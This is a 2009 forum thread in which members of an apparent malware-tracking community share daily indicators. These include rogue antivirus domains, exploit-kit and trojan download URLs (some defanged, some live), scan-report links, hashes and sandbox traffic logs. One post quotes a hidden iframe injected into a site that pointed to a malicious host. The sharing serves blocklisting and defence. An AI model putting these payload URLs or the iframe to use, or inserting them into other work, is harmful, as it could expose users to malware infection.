Title: Re: daily something......
Post by: sparsha on April 21, 2009, 12:59:20 pm
Sites related to rogue application: Home Antivirus 2009

Code: [Select]
h-a-virus-2009.com
h-a-virus2009.com
h-anti-virus-2009.com
h-anti-virus2009.com
h-antivirus2009.com
h-avirus2009.com
ha-virus2009.com
hanti-virus2009.com
hantivirus2009.com
havirus2009.com
home-a-v-2009.com
home-a-virus-2009.com
home-anti-v2009.com
home-anti-virus-2009.com
home-anti-virus2009.com
home-antiv2009.com
home-antivirus2009.com
home-av-2009.com
home-av2009.com
home-avirus2009.com
homeanti-virus-2009.com
homeantiv2009.com
homeantivirus2009.com
homeav-2009.com
homeav2009.com
homeavirus-2009.com
homeavirus2009.com
Title: Re: daily something......
Post by: CkreM on April 21, 2009, 09:19:08 pm
Exploit/trojan:
Code: [Select]
yes-exploit.ru/include/spl.php
http://wepawet.cs.ucsb.edu/view.php?hash=a4e75eb21b28ff23ca48d8d41dad895c&t=1240269807&type=js

Trojan:
Code: [Select]
125.87.2.125/mt/load.php?id=1
http://www.virustotal.com/analisis/b973239d38eb93711e46ab7c8d7d8c60
Title: Re: daily something......
Post by: SysAdMini on April 22, 2009, 04:43:24 am
Code: [Select]
coolwallpapers.statusinfotech.com/ppi/install.exe
http://virscan.org/report/6fcf3670f1e511be8925b19d176205dc.html 14/38
Title: Re: daily something......
Post by: SysAdMini on April 22, 2009, 06:33:20 am
Code: [Select]
sb123.8800.org/files/6.log
http://virscan.org/report/40e37183b23ef501c8c163b35a101441.html 2/38
http://www.threatexpert.com/report.aspx?md5=09cf1539317a107b134595f404aafdb2

Code: [Select]
ipkipk.3322.org/ipk.exe
http://virscan.org/report/711955885ef09950a2dd07800447e45e.html 9/38
Title: Re: daily something......
Post by: Malware-Web-Threats on April 22, 2009, 11:26:06 am
209.44.126.29

Redirects to exploits:
Code: [Select]
hxxp://individualpeople.biz/go.php?sid=1
Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=20ed2f4e9b82bc72da58403395eecc90&t=1240399179&type=js)

Exploits:
Code: [Select]
hxxp://individualpeople.biz/go.php?sid=6
Wepawet (http://wepawet.cs.ucsb.edu/view.php?hash=ba7be5413ac16dab6608f2373a32b615&t=1240196375&type=js)

PDF Exploits:
Code: [Select]
hxxp://209.44.126.30/unsecurity/pdf.php?id=19663

File name: 1.pdf
File size: 7324 bytes
MD5: be9a4f50c3fb024a170b9ec53dd712d4
VirusTotal (http://www.virustotal.com/analisis/9affe859e1ca7d88b7a21f542ede998d) - 15/40 (37.5%)

Trojan:
Code: [Select]
hxxp://209.44.126.30/unsecurity/load.php?id=19663

File name: load.exe
File size: 94208 bytes
MD5: 47c0c6c2ce07c291651070b03dd83d7f
VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/3124e314d118f381c25da0d51dab676a) - 29/40 (72.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=172499a592cac0b249dde8fc2e3eed994)

Quote
From ANUBIS:1033 to 92.48.91.145:80 - [trafficstatic.net] 
Request: GET /banner/crcmds/main 
Response: 200 "OK" 
.......
From ANUBIS:1053 to 72.233.114.126:80 - [statsanalist.cn] 
Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5 
Response: 200 "OK" 
Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5 
Response: 200 "OK" 
Title: Re: daily something......
Post by: SysAdMini on April 22, 2009, 07:22:22 pm
Code: [Select]
xy1.gac4a.com/01/v.exe
http://www.virustotal.com/analisis/a441100772fc53ac9df07971ce444d7e 23/39
Title: Re: daily something......
Post by: Malware-Web-Threats on April 22, 2009, 07:35:11 pm
JS IFRAME
Code: [Select]
hxxp://counnter.cn/top100_00.js
Wepawet (http://wepawet.iseclab.org/view.php?hash=c52bd9668a5eee067b99975751391185&t=1240427410&type=js)

Exploits:
Code: [Select]
hxxp://counnter.cn/z/count.php?o=1
Wepawet (http://wepawet.cs.ucsb.edu/view.php?type=js&hash=d62dc864116e5643e88dc14b2b3b4a8e&t=1239864253)

Exploits:
Code: [Select]
hxxp://counnter.cn/z/exploits/x9.php?zenturi=1
hxxp://counnter.cn/z/exploits/x7b.php
Wepawet (http://wepawet.iseclab.org/view.php?hash=49757767a3408050c3f82314a919217c&t=1240428143&type=js)
Jsunpack (http://jsunpack.jeek.org/dec/go?url=counnter.cn_z_exploits_x7b.php)

Exploits (x15b.zip):
Code: [Select]
hxxp://counnter.cn/z/exploits/x15b.php
VirusTotal: Trojan (http://www.virustotal.com/analisis/735e8f07bf3a55fc8d0ba70ee71379f6) 33/40 (82.5%)

Trojan (getexe.exe):
Code: [Select]
hxxp://counnter.cn/z/getexe.exe?o=1&t=1239892730&i=2154770527&e=10
VirusTotal: Trojan (http://www.virustotal.com/analisis/34f3b96711f909d233f51ac7335f3fc3) - 15/40 (37.5%)
Title: Re: daily something......
Post by: SysAdMini on April 22, 2009, 07:35:31 pm
Code: [Select]
w.94saomm.com/js.js
redirects to
Code: [Select]
www.10555.com/tv/fs.htm
http://wepawet.cs.ucsb.edu/view.php?hash=5380b380d7481ff7234b4cc9af6609c0&t=1240429053&type=js

Various exploits lead to
Code: [Select]
b.wuc9.com/ac.css
http://www.virustotal.com/analisis/a3fdd8fcaa34c553ea0f7864296c4628 23/40
Title: Re: daily something......
Post by: PaJamis on April 22, 2009, 10:54:30 pm
hxxp://www.edfvc.com

Comes up with Mal/Obfjs-AE with Sophos
http://www.sophos.com/security/analyses/viruses-and-spyware/malobfjsae.html

Obfuscated JS resolves to:

Code: [Select]
<iframe src="hxxp://googl-analisys.com/adwds/words.php?U8jG" style="display:none"></iframe>
MysteryFCM: Encased iFrame HTML in BBCode "CODE" tags.
Title: Re: daily something......
Post by: CkreM on April 22, 2009, 11:34:25 pm
Zbot:
Code: [Select]
zss5dfggd.com/exe/ue.exe
http://www.virustotal.com/analisis/d5ba440a4de0b771088cd4b3714dbfae
Trojan:
Code: [Select]
zss5dfggd.com/exe/9.exe
http://www.virustotal.com/analisis/cafeb16b4df77833b8b1218f2f30b3ea
Trojan:
Code: [Select]
zss5dfggd.com/exe/lich.exe
http://www.virustotal.com/analisis/dde89e65277fe2cab50bc054c4c1e499
Trojan:
Code: [Select]
zss5dfggd.com/exe/gld.exe
http://www.virustotal.com/analisis/c48f145c65c717fcf4b750ae2c7cdd89
Trojan:
Code: [Select]
zss5dfggd.com/exe/mp.exe
http://www.virustotal.com/analisis/862f2e619d840b98a6e359e2ddb84f24

Fake AV:
Code: [Select]
winpcdown9.com/pcdef.exe
http://www.virustotal.com/analisis/ad13d92e29f9521c6ae48760ea106ed9
and the payment site it uses:
Code: [Select]
billingpayment.net/pp/?id=
Fake online scan:
Code: [Select]
litetubevideoz.com/scan
and the trojan that is downloaded:
Code: [Select]
litetubevideoz.com/codec.exe
http://www.virustotal.com/analisis/7b25de92bab8faf17a0da0acd7464afb

Trojan:
Code: [Select]
litetubevideoz.com/null/exe2/3913443.exe
http://www.virustotal.com/analisis/4ba420744c78124fe6c00a28045628ae

Fake online scan:
Code: [Select]
online-spyware-scan.net/online-scan.html?ewmid=226
Title: Re: daily something......
Post by: SysAdMini on April 23, 2009, 12:53:43 pm
From banner ads to fake AV

Code: [Select]
perfect-banner.com/www/images/300x250_uof_2.swf?clickTARGET=_blank&clickTAG=http://perfect-banner.com/www/delivery/ck.php?oaparams=2__bannerid=250__zoneid=171__cb=c8b86ecece
http://wepawet.iseclab.org/view.php?hash=17501d47ade222cffa45fc0f2f7c84bc&type=swf

SWF redirects to
Code: [Select]
enjoyspringtime.com/?cmpid=dologology
redirects to
Code: [Select]
crustat.com/ts/in.cgi?mfcdologology&se=oth&ur=1&HTTP_REFERER=enj-cmpid%3Ddologology

redirects to
Code: [Select]
pnfzetnax.net/pro/dologology/
redirects to
Code: [Select]
78.47.132.220/aff78.php?url=http://truconv.com/?a=125&s=4a78
redirects to
Code: [Select]
78.47.132.220/a82a/cr/adv/142/index.html
Code: [Select]
78.47.132.220/a82a/cr/srm_free_setup.exe
http://www.virustotal.com/de/analisis/07fe8c68d017097af9ec74ebb8cc1dc6 18/40
MD5...: 66c7e910330c631ba4515781f44e2788

Title: Re: daily something......
Post by: CkreM on April 24, 2009, 12:14:52 am
Exploits/Pinch trojan:
Code: [Select]
indiasportnews.com/mt/in.php
http://wepawet.cs.ucsb.edu/view.php?hash=4bb0a47f5b7fefbf32bb501c2f314bc0&t=1240532359&type=js

Trojan:
Code: [Select]
crisiss.net/at.exe
http://www.virustotal.com/analisis/7fcd8acc15681586603bbb368a75fd54

Fake AV - pretty big one, 5.8MB
Code: [Select]
setup.malwareremovalbot.com/setup.exe
http://www.virustotal.com/analisis/cf5ed54f4ec27bc84aaa528f50dd750a
Title: Re: daily something......
Post by: Malware-Web-Threats on April 24, 2009, 10:49:44 am
Redirects to trojan:
Code: [Select]
hxxp://zbesttds.com/in.cgi?3
hxxp://zbesttds.com/in.cgi?4
Wepawet (http://wepawet.iseclab.org/view.php?hash=8f02ba1f78de6938def093f3e1c0d3c1&t=1240567079&type=js)
Code: [Select]
hxxp://zbesttds.com/in.cgi?5
hxxp://400.myfilehostings.net/movie.html
Wepawet (http://wepawet.iseclab.org/view.php?hash=6f34c32530fef1bf4e158c4f8c03f0e5&t=1240568871&type=js)
Code: [Select]
hxxp://tafficbots.com/in.cgi?8
hxxp://tafficbots.com/in.cgi?9
Wepawet (http://wepawet.iseclab.org/view.php?hash=b94025b4f058045a56a43069a3e1bfed&t=1240569469&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=633582e4121c69b1958525add78f77de&t=1240569515&type=js)
Trojan:
Code: [Select]
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424095121892881/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424095121892881/2.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/2.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/3.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/4.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/6.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/7.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/8.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241021678229191/9.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/0424103022287492/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241031340125215/1.gif
hxxp://asusdisp.org/file/1931/2df8718075249dc35642f6b633751605/04241035734251381/1.gif
Quote
Size:   125440 bytes,
MD5:   f4342703b051c0ea1c81f0330f10dc3f
VirusTotal (http://www.virustotal.com/analisis/acfa3c724c289794d4a89ba772b69811) - 30/40 (75%)

*****************
Redirects to google:
Code: [Select]
hxxp://zbesttds.com/in.cgi?11
hxxp://zbesttds.com/in.cgi?16
Wepawet (http://wepawet.iseclab.org/view.php?hash=332ec8368583bb2ce3be288e149dc3db&t=1240566551&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=af20a07cd051895441993908c11e13ec&t=1240566589&type=js)

*****************
Redirects to rogue: (dead since a few hours)
Code: [Select]
hxxp://zbesttds.com/in.cgi?14
Wepawet (http://wepawet.iseclab.org/view.php?hash=cba930c84e61fb44e0f5d20bc30c0e95&t=1240566362&type=js)

*****************
Redirects to rogue:
Code: [Select]
hxxp://hitmidpoint.com/?accs=809&tid=1
hxxp://staritquick.com/in.cgi?13&gai=csptop&gli=100&gff=cs_362527174&al=
Wepawet (http://wepawet.iseclab.org/view.php?hash=3d0150bd82c70819f998c387e76d1c2f&t=1240568055&type=js)

*****************
Redirects to fake codec page:
Code: [Select]
hxxp://delshiktds.com/in.cgi?3
hxxp://myhealtharea.cn/in.cgi?2
Fake codec page:
Code: [Select]
hxxp://xtube-download.freehostia.com/tube.htm
Wepawet (http://wepawet.iseclab.org/view.php?hash=d3567427faceb030997915bee804c0cf&t=1240565964&type=js)

*****************
Redirects to fake codec page:
Code: [Select]
hxxp://tafficbots.com/in.cgi?7
Wepawet (http://wepawet.iseclab.org/view.php?hash=6e22b57b654e6eeaa93887271fb84dc3&t=1240569461&type=js)
Fake codec page:
Code: [Select]
hxxp://megaporntubes09.com/xplaymovie.php?id=40011
Wepawet (http://wepawet.iseclab.org/view.php?hash=6e22b57b654e6eeaa93887271fb84dc3&t=1240569461&type=js)
Trojan:
Code: [Select]
hxxp://lll-softportal.com/softwarefortubeview.40011.exe
VirusTotal: Trojan (http://www.virustotal.com/analisis/d9a5fd9a4915b87759a0544e7b8f97d3) - 7/40 (17.5%)

*****************
Redirects to rogue:
Code: [Select]
hxxp://kernelseo.com/in.cgi?default&parameter=up-file+download&se=15557
Wepawet (http://wepawet.iseclab.org/view.php?hash=4f32a80ccc9f49057e5d1a596bf6b010&t=1240385217&type=js)
Title: Re: daily something......
Post by: sparsha on April 25, 2009, 05:01:16 am
Code: [Select]

http://antivir-scan-pro-best.com/11041/3/
http://files.load-archive-av-pro.com/normal/setup_11041_3_1.exe
http://int.sysproreport1.com/stat.php?func=installrun&id=11041&landing=-1&lang=EN&sub=1&notstat=1
http://dl.super-top-scan-pro.com/get/?pin=11041&lnd=-1&type=main

http://files.get-fails-load-av.com/release/setup.exe
http://dl.scan-anti-spy-4free.com/get/?pin=0&lnd=-1&type=scanner

Title: Re: daily something......
Post by: SysAdMini on April 25, 2009, 09:33:12 am
Code: [Select]
music24shop.net/2/in.php
http://wepawet.cs.ucsb.edu/view.php?hash=cbf9102477119497295d517be62e4053&t=1240651814&type=js

Code: [Select]
http://music24shop.net/2/pdf.php
http://www.virustotal.com/analisis/08f4c49651626507490afd80932f4f71 1/38

Code: [Select]
music24shop.net/2/load.php?id=6
http://www.virustotal.com/analisis/dd3c7093b2b0827d6ee987b83f015faa 7/40
Title: Re: daily something......
Post by: CkreM on April 26, 2009, 07:03:19 am
Exploit/trojan:
Code: [Select]
wtopcompany.ru/cms/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=3f1acb074a6e8c6b03da890c06e1c4db&t=1240555768&type=js

Fake AV scan:
Code: [Select]
tubeontvgl.com/scan/?id=262
What's downloaded from there:
Code: [Select]
uploadmoviez.com/codec.exe
http://www.virustotal.com/analisis/3a09d83950707cd8c0f4c23d913c0129

Same files on the same IP:
Code: [Select]
youngsters.ru/codec.exe
pc-codec-pack.com/codec.exe
suckitnow1.net/codec.exe
velzevuladmin.com/codec.exe
Title: Re: daily something......
Post by: CkreM on April 26, 2009, 09:03:18 am
Rogue:
Code: [Select]
Snobelium.com
Diastolea.com
cussermono.com
Title: Re: daily something......
Post by: SysAdMini on April 26, 2009, 10:24:31 am
Rogue:
Code: [Select]
Snobelium.com
Diastolea.com
cussermono.com

Looks like templates for future fake AVs. There is no additional content other than the page itself.
Title: Re: daily something......
Post by: CkreM on April 27, 2009, 04:19:36 am
Rogue:
Code: [Select]
Snobelium.com
Diastolea.com
cussermono.com

Looks like templates for future fake AVs. There is no additional content other than the page itself.

Yeah, I noticed that.
Will have content in the future probably..


Seems like IRC bot/backdoor:
Code: [Select]
77.75.105.221/e-card/e-card.gif.exe
http://www.virustotal.com/analisis/335638c7877b9d21eabb7f5e12881fe9
Title: Re: daily something......
Post by: RS-232 on April 27, 2009, 11:28:05 am
For the fun of it...
Quote
hxxp://youarelucky.biz/SmartDownload.exe
http://www.virustotal.com/analisis/786657fbd9af08fef0cb1745bce68fa5
hxxp://200.122.168.229/dl/goldvipclub/TrackDownload.dll?DID=991392
http://www.virustotal.com/analisis/5d97aab77fba7ca6ab7ecf6728034a15
hxxp://200.122.168.229/dl/goldvipclub/
http://www.virustotal.com/analisis/aef4b913ccfbe8918e83a8ed48870ddd
Title: Re: daily something......
Post by: XiTri on April 27, 2009, 03:16:41 pm
This
Code: [Select]
http://neono.biz/myy/index.php
And this
Code: [Select]
http://tipojud.com/quq/1/loads.php?id=68
Title: Re: daily something......
Post by: Malware-Web-Threats on April 27, 2009, 10:06:49 pm
Exploits:
Code: [Select]
hxxp://210.240.61.68/fish/GV14.htm
Wepawet (http://wepawet.iseclab.org/view.php?hash=3b005d98e244f3ac81a6f4e59c1ecb68&t=1240870109&type=js)

Trojan:
Code: [Select]
hxxp://www.spps.hlc.edu.tw/fish/1.exe
VirusTotal (http://www.virustotal.com/analisis/6e8ce06db44695743a9fc41859394f50) - 17/40 (42.5%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=10e108d39962a6ac4754702165f33b3e7)
Title: Re: daily something......
Post by: michajp on April 28, 2009, 02:17:16 am
'Greeting cards' (IRC bot/backdoor):

Code: [Select]
hxxp://greetings.3utilities.com/logs/greetings.exe
hxxp://66.83.239.226/E-Greetings.exe
Title: Re: daily something......
Post by: CkreM on April 28, 2009, 03:51:19 am
Fake AV:
Code: [Select]
fullsecurityaction.com
Anytoplikedsite.com
yourpcshield.com
totalvirushield.com
myfirstsecurityscan.com
stopspyware.org

Exploit/trojan:
Code: [Select]
78.47.132.221/l3/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=6f5cdfe1c1aeb5cd68a034c3c2984dc8&t=1240889755&type=js

Seems like Koobface:
Code: [Select]
70.254.41.230/setup.exe
http://www.virustotal.com/analisis/9dfc0bc4f3e5ea13ae76859d939a8fd8
Title: Re: daily something......
Post by: RS-232 on April 28, 2009, 07:36:57 am
Quote
hxxp://verringo.cn/bmngr2/controller.php?action=bot&entity_list=
From the same ip:
Quote
hxxp://www.downloads-123.com/dyyhhj1g/3j2khf32/aap.exe
http://www.virustotal.com/analisis/85d89df7d1f11b6178ba112551a4c248
hxxp://downloads-123.com/guard.exe
http://www.virustotal.com/analisis/1e3f57b7808d6e154dcea62a6e53d2f0
Result: 1/40 (2.5%)

Quote
hxxp://91.207.61.12/stata/controller.php?action=bot&entity_list=
From the same ip:
Quote
hxxp://tomohappy.com/forum/data.php?id=500
hxxp://tomohappy.com/forum/data.php?id=5xx   // where xx is whatever numeric value...
http://www.virustotal.com/analisis/97eb93b986035c20b613677ba6235136
Result: 13/40 (32.50%)

Quote
hxxp://goooodbill.cn/unig/load.php
http://www.virustotal.com/analisis/5b838bbb5899ae16758851bf33d7521c
Result: 15/40 (37.5%)

Quote
hxxp://myspyfiles.cn/qazwsx/index.php
Injection - redirects to the already listed rutraff.cn:
http://www.google.com/search?hl=en&q=myspyfiles.cn&btnG=Google+Search

Quote
hxxp://xcount.cc/ads/in.cgi?13
hxxp://weh8dnb.com/cp/index.php
hxxp://weh8dnb.com/cp/load.php
http://www.virustotal.com/analisis/143e40ce67aa7846b7a06ac080c6bb34
Result: 4/40 (10%)
Title: Re: daily something......
Post by: SysAdMini on April 28, 2009, 09:10:29 am
Code: [Select]
sorwwwros.cn/life/t.php
Code: [Select]
sorwwwros.cn/life/fdoc.pdf
http://www.virustotal.com/analisis/7e2777e6031abc9c55597bd880ad2f25 6/40
MD5...: 9de067ace8636a8a788a3925533e9660
http://wepawet.cs.ucsb.edu/view.php?hash=9de067ace8636a8a788a3925533e9660&type=js

Code: [Select]
sorwwwros.cn/life/fdem.swf
http://www.virustotal.com/analisis/75ff201372b07627b2e00defa0739510 0/40
MD5...: c7c0f03b8a7fec6b163c501bcb4d8500

Payload:
Code: [Select]
sorwwwros.cn/life/l.php?b=4&s=PDF
http://www.virustotal.com/analisis/0b67d1b488abcb478155d20ec2708633 17/40
MD5...: 84909a9d6cdc7c50cfd9da181232df7a
Title: Re: daily something......
Post by: RS-232 on April 28, 2009, 10:38:14 am
The...usual suspects:
Quote
hxxp://rxtraffclicks.com/download/1/1000/5
http://www.virustotal.com/analisis/4e670f047ca735c1e65f8e8aa458ca1f
Result: 15/40 (37.5%)

Quote
hxxp://pornosbest.com/movies/movie1.wmv.exe
http://www.virustotal.com/analisis/64bb880feb8b31a351c2809dc8549dde
Result: 12/40 (30%)
====================
These ones are currently being injected in unsuspecting sites... for now, they all lead to (already listed) litevehiclemall.cn...
Quote
hxxp://betbigwager.cn/in.cgi?income61
hxxp://hotslotpot.cn/in.cgi?income65
hxxp://litecartop.cn/in.cgi?income70
hxxp://lotultimatebet.cn/in.cgi?income60

http://www.robtex.com/ip/213.163.91.93.html
http://www.bfk.de/bfk_dnslogger.html?query=213.163.91.93#result
And...
http://www.robtex.com/ip/213.182.197.23.html
http://www.bfk.de/bfk_dnslogger.html?query=213.182.197.23#result

Another one which is being injected...
Quote
hxxp://nyoflak.com/?click=3C5DCB
According to Wepawet,it also leads to "openstats.info":
http://wepawet.cs.ucsb.edu/view.php?hash=b8ace1842982cb47ee7a390120812436&t=1240920333&type=js
But someone didn't want to blacklist openstats.info a few days earlier when I had mentioned it...   ;D  ;)

Yet one more:
Quote
hxxp://nipkelo.net/?click=5A158BD

The story in short - with even more domains to be blocked etc etc...
http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/

Quote
hxxp://simple-faq.cc/stat.js
hxxp://a-stone.biz/xZfmG3YK1/
hxxp://a-stone.biz/xZfmG3YK1/flash.php?id=1647&spl=14
hxxp://a-stone.biz/xZfmG3YK1/load.php?id=1647
http://www.virustotal.com/analisis/b9495d617e3535b2420d19e25ce1b57f
Result: 16/40 (40%)

Now, what I've found rather interesting... is what happens when querying a-stone.biz directly, via Wepawet... and without the simple-faq.cc referrer:
http://wepawet.cs.ucsb.edu/view.php?hash=5a514c44b04f33c1834083a2a05e1432&t=1240934612&type=js
Code: [Select]
Redirects
From
http://a-stone.biz/xZfmG3YK1/
To
http://grabberz.com
It's a small world out there...   ;)
Title: Re: daily something......
Post by: RS-232 on April 29, 2009, 08:49:20 am
Another lameness which is being injected to sites out there...
Quote
hxxp://77.92.158.122/webmail/inc/web/index.php
Quote
hxxp://77.92.158.122/webmail/inc/web/include/two.pdf
http://www.virustotal.com/analisis/29e7ee82e1302ef9559db58b41527755
Result: 14/40 (35%)
Quote
hxxp://77.92.158.122/webmail/inc/ -> Open dir...
Title: Re: daily something......
Post by: RS-232 on April 29, 2009, 11:13:38 am
Quote
hxxp://betbigwager.cn/in.cgi?income
hxxp://hotslotpot.cn/in.cgi?income
hxxp://litecarfinestsite.cn/in.cgi?income
hxxp://litecartop.cn/in.cgi?income
hxxp://lotultimatebet.cn/in.cgi?income
Title: Re: daily something......
Post by: sparsha on April 29, 2009, 05:10:57 pm
Code: [Select]
http://nhgfngfdhngf.com/fff9999.php?aid=40012&uid=e0905079d41d8cd98f00b204e9800998ecf8427e&os=512

http://imageempires.com/perce/1e20a980a5c00739dd84315d884c4d49081fa0501bd2a074be995820802939a85eec2ff8a432377ec/64d050a1229/perce.jpg
http://sphericalart.com/item/be3049005510b7d9dd4431fdd86c2d79b80fa0a0bbd2e034ae4908f0f02989a86eccafc8e45297bea/c4a07021c2e/item.gif
http://imagesmonitor.com/werber/e4d08081926/216.jpg
http://em.pc-on-internet.com/eas?camp=22768&ty=ct&popt1=1220&popt2=DE
http://download.web-mediaplayer.com/Web-MediaPlayer_setup.php?grpid=2053&tag_id=717&nums=FFjwag.AAA&popt1=1220&popt2=DE

Rogues

Code: [Select]
http://pcantimalware.com/PCAntiMalwareScannerSetup.exe
http://pc-privacydefender.com/PCPrivacyDefenderScannerSetup.exe

http://totalsystemguard.com/page.php?id=44
http://totalvirushield.com/download.php?affid=00000
http://totalvirushield.com/install/ws.zip

http://pro-scanner-antivir-free.com/11041/3/
http://files.loads-antiviral-files.com/normal/setup_11041_3_1.exe


Fake codecs

Code: [Select]
http://kokc-softportal.com/softwarefortubeview.40006.exe
http://uploadsmovies.com/codec/106.exe
Title: Re: daily something......
Post by: CkreM on April 30, 2009, 03:47:13 am
Trojan:
Code: [Select]
secure123.org/img/winagent.exe
http://www.virustotal.com/analisis/cae7efe27fcd81c66f8e050b937de712
Trojan:
Code: [Select]
neirrela92-ammi.cn/it021.exe
http://www.virustotal.com/analisis/4cd315b8b8cbcd96802332a6ba59d90d
Trojan:
Code: [Select]
fddporn.net/6007_1.exe
http://www.virustotal.com/analisis/e2cdbb3586041e93705d5e88a3d72d42
Fake AV:
Code: [Select]
fddporn.com/av.26.0.exe
http://www.virustotal.com/analisis/7f7dccb45937295dd11c73a989330b61
The fake AV website:
Code: [Select]
antiwareprotect.com
The fake payment site:
Code: [Select]
https://secure.paysecureorder.com/order?agree=on&prodid=2&r=1.0&butt=
Exploit/trojan:
Code: [Select]
karavan.us/bon/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=6b8c81232ad4b6589475d706c22a061a&t=1241050191&type=js
Exploit/trojan:
Code: [Select]
karavan.us/sng/cache/readme.pdf
http://wepawet.cs.ucsb.edu/view.php?hash=3738291a02aadc69a7c9ed9e692d9b67&t=1241050218&type=js
Title: Re: daily something......
Post by: XiTri on April 30, 2009, 10:19:43 am
Code: [Select]
http://neono.biz/opi/index.php
http://neono.biz/opi/cache/readme.pdf
http://neono.biz/opi/cache/flash.swf
http://neono.biz/opi/load.php
http://neono.biz/myy/load.php
Title: Re: daily something......
Post by: sriramp on April 30, 2009, 01:33:46 pm
hxxp://egangoff.com/images/pdf.php
hxxp://egangoff.com/images/builder.php - Flash
Title: Re: daily something......
Post by: RS-232 on April 30, 2009, 04:18:00 pm
Quote
hxxp://liora.co.za/images/
http://wepawet.cs.ucsb.edu/view.php?hash=6751dee94cb3088705b66504d435a934&t=1241108619&type=js
http://www.virustotal.com/analisis/506618b146220329eb6ac64c552d0aed
Title: Re: daily something......
Post by: sparsha on April 30, 2009, 04:54:15 pm
Code: [Select]

bitcoreguard.net
bitcoreguard.com
guardlab.com
guardav.com
coreguard2009.com
coreguard2009.biz
coreguard2009.net
coreguardlab2009.biz
coreguardlab2009.net
coreguardlab2009.com
guardlab2009.biz
guardlab2009.net
guardlab2009.com

http://coreguard2009.com/coreguardd.exe
http://guardlab2009.com/InstallerWF.exe


Another interesting site from this gang??
Code: [Select]
just4yourtranquillity.com
Title: Re: daily something......
Post by: RS-232 on April 30, 2009, 05:31:59 pm
Quote
hxxp://bigbargin.cn/file1.exe
And that's what happens to lamers still using MicroJoiner in 2009...  ;D
http://www.virustotal.com/analisis/2977518dd680ba0acde393f6e9d58a10

From a well-known net neighbourhood...
Quote
hxxp://downfilg.com/in.cgi?2&a=1.exe  // where "1" can be substituted with whatever string you want...
hxxp://keygroundc.com/download/1%2Eexe
http://www.virustotal.com/analisis/00f4e6ad59857e5d9a0920052317a471
Title: Re: daily something......
Post by: sparsha on April 30, 2009, 06:37:56 pm
Little bit of this and a little bit of that

Code: [Select]
http://fast-scanner-av-pro.com/11041/3/

http://thefullvirusscan.com/download.php?affid=08073

http://kekc-softportal.com/softwarefortubeview.40012.exe

http://upd.pccleansolution.com/?proto=4&rc=UAMS-0001-8882-7773&v=99.3.3.1&abbr=WBASE&platform=nt&os_version=5.1.2600.2.0&ac=B10511E3-DB89-4D8F-9666-5A0BA1ED885F&appid=UAMS&em=&pcid=2561334094&sv=

ReturnCode: 0
Text:
ProductVersion: 99.3.3.351
File:MalwareDB3510.exe,3871295,684586667,http://dl.setforinfo.com/updates/83/153/MalwareDB3510.exe
File:vbpv.dat,10,-830365698,http://dl.setforinfo.com/updates/83/153/vbpv.dat
File:update.script,143,-1272521259,http://scripts.setforinfo.com/update_script.php?ids=285_287

Title: Re: daily something......
Post by: RS-232 on April 30, 2009, 07:10:56 pm
Quote
hxxp://prodownloadmanager.com/install.php
Title: Re: daily something......
Post by: RS-232 on April 30, 2009, 08:20:15 pm
http://www.bfk.de/bfk_dnslogger.html?query=195.2.253.41#result

traff.loadmore.eu is already in the list...

traff.loadd.in is Virut-related:
http://www.threatexpert.com/report.aspx?md5=4586242be6d360f577725e1487c2d7cf
http://www.prevx.com/filenames/1076913952874868034-X1/KEYGEN_SPYHUNTER.SECURITY.SUITE.V3.7.19%5B.html

And regarding the other 2 domains there...

Quote
hxxp://fineles.yourfoxlink.net/download/1.exe // ...very well-detected, you can change "1" to whatever string you want...
http://www.virustotal.com/analisis/9739b2f5e6adee880d9b86687d2c7ba1
Result: 34/40 (85%)

Quote
hxxp://yourfoxlink.net/files/1.exe // ...you can change "1" to whatever string you want...
hxxp://www.virustotal.com/analisis/d113e8d8aae448d9ebe320b7f9c15696
Result:10/40 (25%)
Title: Re: daily something......
Post by: CkreM on April 30, 2009, 11:14:55 pm
Trojans:
Code: [Select]
gertruweq.com/ee/gld.exe
http://www.virustotal.com/analisis/92dbc2bad00080a577cb17ecb7cfd7b2
Code: [Select]
gertruweq.com/ee/ret.exe
http://www.virustotal.com/analisis/9a8654be39f40883c05c6b44708596cd
Code: [Select]
gertruweq.com/ee/9.exe
http://www.virustotal.com/analisis/f3fc6085f437fb11591a79c2c1331e43
Title: Re: daily something......
Post by: CkreM on May 01, 2009, 06:12:52 am
Exploit/trojan:
Code: [Select]
adul8tra.cn/forum/foxpdf.php
http://wepawet.iseclab.org/view.php?hash=fbc7708cc988b8a5709796f83197a905&t=1241158354&type=js
Code: [Select]
k1l3r.ru/Y/include/spl.php
http://wepawet.iseclab.org/view.php?hash=b673dbc9d832f66c67af103cb1dbf9e8&t=1240825850&type=js
Title: Re: daily something......
Post by: Malware-Web-Threats on May 02, 2009, 12:06:50 am
Code: [Select]
hxxp://basesrv3.net/yes/load.php
VirusTotal: Trojan (http://www.virustotal.com/analisis/cba60d1c2b108f1e03a46518980a142d) - 21/38 (55.26%)

